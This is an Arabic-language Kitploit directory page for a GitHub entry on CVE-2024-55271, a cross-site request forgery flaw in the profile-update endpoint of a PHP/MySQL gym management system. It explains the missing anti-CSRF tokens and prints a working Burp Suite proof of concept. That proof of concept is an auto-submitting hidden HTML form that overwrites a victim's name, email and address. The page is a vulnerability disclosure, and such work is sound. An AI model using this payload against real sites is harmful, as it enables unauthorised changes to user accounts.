Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-55271 — نظام إدارة صالة الألعاب الرياضية باستخدام PHP و MYSQL | Kitploit
أدوات/GitHubGitHub/shoaibalam112/cve-2024-55271
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

نظام إدارة صالة الألعاب الرياضية باستخدام PHP و MYSQL

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام إدارة الصالة الرياضية ( CVE-2024-55271 )

نظام إدارة صالة رياضية مبني باستخدام PHP وMySQL.

المدقق

Shoaib Alam - ملف لينكد إن

الوصف

ثغرة CSRF في قسم تحديث الملف الشخصي

تم تحديد ثغرة من نوع Cross-Site Request Forgery (CSRF) في نظام إدارة الصالة الرياضية. هذه المشكلة موجودة في وظيفة تحديث الملف الشخصي في لوحة المستخدم.

التطبيق حالياً يفتقر إلى تنفيذ رموز مضادة لـ CSRF، مما يؤدي إلى الثغرة في هجمات Cross-Site Request Forgery (CSRF). هذا الضعف الأمني يؤثر بشكل خاص على نقطة النهاية /profile.php. يمكن للمهاجم استغلال هذا الخلل لتنفيذ تعديلات غير مصرح بها على معلومات المستخدم الحساسة، مثل العنوان والاسم ورقم الهاتف. قد يؤدي هذا إلى المساس بسلامة حسابات المستخدمين ويؤدي إلى مشاكل أمنية أخرى.

نقطة النهاية الضعيفة: /profile.php

إثبات المفهوم (PoC)

فيما يلي إثبات المفهوم الذي يوضح ثغرة CSRF. تم إنشاء هذا PoC باستخدام Burp Suite Professional.

root@kitploit:~
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost/gym/profile.php" method="POST"> <input type="hidden" name="fname" value="hacked" /> <input type="hidden" name="lname" value="victim" /> <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" /> <input type="hidden" name="mobile" value="9999999999" /> <input type="hidden" name="state" value="hacked" /> <input type="hidden" name="city" value="hacked" /> <input type="hidden" name="address" value="hacked" /> <input type="hidden" name="submit" value="Update" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
تنزيل الأداة